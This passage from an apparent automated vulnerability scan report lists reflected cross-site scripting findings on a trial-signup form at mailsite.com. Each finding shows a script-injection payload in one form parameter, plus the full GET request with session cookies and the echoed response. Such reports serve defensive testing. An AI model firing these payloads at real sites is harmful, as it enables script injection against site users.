GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=&Phone=&Ext=&Email=d28d3"><script>alert(1)</script>067b77b653664807&Email2=&UserName=&Website=&Company=&Country=&State=AA&StateText=&Zip=&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:08:38 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28259


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" size="30" maxlength="100" name="Email" value="d28d3"><script>alert(1)</script>067b77b653664807" ID="Text5">
...[SNIP]...

3.70. http://www.mailsite.com/portal/trial.asp [Email2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the Email2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5024a"><script>alert(1)</script>c4dc73218bdf8135f was submitted in the Email2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=&Phone=&Ext=&Email=&Email2=5024a"><script>alert(1)</script>c4dc73218bdf8135f&UserName=&Website=&Company=&Country=&State=AA&StateText=&Zip=&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:08:49 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28260


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" autocomplete="off" size="30" maxlength="100" name="Email2" value="5024a"><script>alert(1)</script>c4dc73218bdf8135f" ID="Text6">
...[SNIP]...

3.71. http://www.mailsite.com/portal/trial.asp [Ext parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the Ext request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62da0"><script>alert(1)</script>8132e80da77b74d5d was submitted in the Ext parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=&Phone=&Ext=62da0"><script>alert(1)</script>8132e80da77b74d5d&Email=&Email2=&UserName=&Website=&Company=&Country=&State=AA&StateText=&Zip=&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:08:27 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28260


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" size="6" maxlength="6" name="Ext"
value="62da0"><script>alert(1)</script>8132e80da77b74d5d" ID="Text4">
...[SNIP]...

3.72. http://www.mailsite.com/portal/trial.asp [FirstName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the FirstName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e45f"><script>alert(1)</script>002c41aa3e5422ea6 was submitted in the FirstName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=7e45f"><script>alert(1)</script>002c41aa3e5422ea6&LastName=&Phone=&Ext=&Email=&Email2=&UserName=&Website=&Company=&Country=&State=AA&StateText=&Zip=&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:07:53 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28260


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" size="15" maxlength="15" name="FirstName"
value="7e45f"><script>alert(1)</script>002c41aa3e5422ea6" ID="Text1">
...[SNIP]...

3.73. http://www.mailsite.com/portal/trial.asp [LastName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the LastName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bf78"><script>alert(1)</script>4004675a7accf1613 was submitted in the LastName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=6bf78"><script>alert(1)</script>4004675a7accf1613&Phone=&Ext=&Email=&Email2=&UserName=&Website=&Company=&Country=&State=AA&StateText=&Zip=&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:08:04 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28260


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" size="25" maxlength="25" name="LastName"
value="6bf78"><script>alert(1)</script>4004675a7accf1613" ID="Text2">
...[SNIP]...

3.74. http://www.mailsite.com/portal/trial.asp [MailboxQty parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the MailboxQty request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad01b"><script>alert(1)</script>f97f00b1bc61e0487 was submitted in the MailboxQty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=&Phone=&Ext=&Email=&Email2=&UserName=&Website=&Company=&Country=&State=AA&StateText=&Zip=&CustBusiness=&MailboxQty=ad01b"><script>alert(1)</script>f97f00b1bc61e0487&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:10:44 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28260


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" size="10" maxlength="10" name="MailboxQty" value="ad01b"><script>alert(1)</script>f97f00b1bc61e0487" ID="Text11">
...[SNIP]...

3.75. http://www.mailsite.com/portal/trial.asp [Phone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the Phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66eec"><script>alert(1)</script>af95af7433ec180f6 was submitted in the Phone parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=&Phone=66eec"><script>alert(1)</script>af95af7433ec180f6&Ext=&Email=&Email2=&UserName=&Website=&Company=&Country=&State=AA&StateText=&Zip=&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:08:15 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28236


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" size="20" maxlength="20" name="Phone" value="66eec"><script>alert(1)</script>af95af7433ec180f6" ID="Text3">
...[SNIP]...

3.76. http://www.mailsite.com/portal/trial.asp [SourceDesc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the SourceDesc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad0ec"><script>alert(1)</script>40e439a7c6095ec33 was submitted in the SourceDesc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=&Phone=&Ext=&Email=&Email2=&UserName=&Website=&Company=&Country=&State=AA&StateText=&Zip=&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc=ad0ec"><script>alert(1)</script>40e439a7c6095ec33 HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:11:09 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28260


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" size="50" maxlength="60" name="SourceDesc"
value="ad0ec"><script>alert(1)</script>40e439a7c6095ec33" ID="Text10">
...[SNIP]...

3.77. http://www.mailsite.com/portal/trial.asp [StateText parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the StateText request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d0ed"><script>alert(1)</script>cb2b62692953b2e7a was submitted in the StateText parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=&Phone=&Ext=&Email=&Email2=&UserName=&Website=&Company=&Country=&State=AA&StateText=7d0ed"><script>alert(1)</script>cb2b62692953b2e7a&Zip=&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:10:12 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28212


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" size="20" maxlength="20" name="StateText" value="7d0ed"><script>alert(1)</script>cb2b62692953b2e7a" ID="Text9">
...[SNIP]...

3.78. http://www.mailsite.com/portal/trial.asp [UserName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the UserName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26a60"><script>alert(1)</script>a47f54a6dcb361cb2 was submitted in the UserName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=&Phone=&Ext=&Email=&Email2=&UserName=26a60"><script>alert(1)</script>a47f54a6dcb361cb2&Website=&Company=&Country=&State=AA&StateText=&Zip=&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:09:00 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28260


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" size="25" maxlength="15" name="UserName"
value="26a60"><script>alert(1)</script>a47f54a6dcb361cb2">
...[SNIP]...

3.79. http://www.mailsite.com/portal/trial.asp [Website parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the Website request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cbeb"><script>alert(1)</script>7d95377e38fb8dfe9 was submitted in the Website parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=&Phone=&Ext=&Email=&Email2=&UserName=&Website=9cbeb"><script>alert(1)</script>7d95377e38fb8dfe9&Company=&Country=&State=AA&StateText=&Zip=&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:09:12 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28423


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" size="30" maxlength="80" name="Website"
value="9cbeb"><script>alert(1)</script>7d95377e38fb8dfe9" ID="Text7">
...[SNIP]...

3.80. http://www.mailsite.com/portal/trial.asp [Zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the Zip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecea8"><script>alert(1)</script>4622cbfd507228337 was submitted in the Zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=&Phone=&Ext=&Email=&Email2=&UserName=&Website=&Company=&Country=&State=AA&StateText=&Zip=ecea8"><script>alert(1)</script>4622cbfd507228337&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:10:23 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28236


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" size="10" maxlength="10" name="Zip" value="ecea8"><script>alert(1)</script>4622cbfd507228337">
...[SNIP]...

3.81. http://www.mailsite.com/portal/trial.asp [key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0a8d"><script>alert(1)</script>379f3fe056866076e was submitted in the key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /portal/trial.asp?key=e0a8d"><script>alert(1)</script>379f3fe056866076e&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=&Phone=&Ext=&Email=&Email2=&UserName=&Website=&Company=&Country=&State=AA&StateText=&Zip=&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
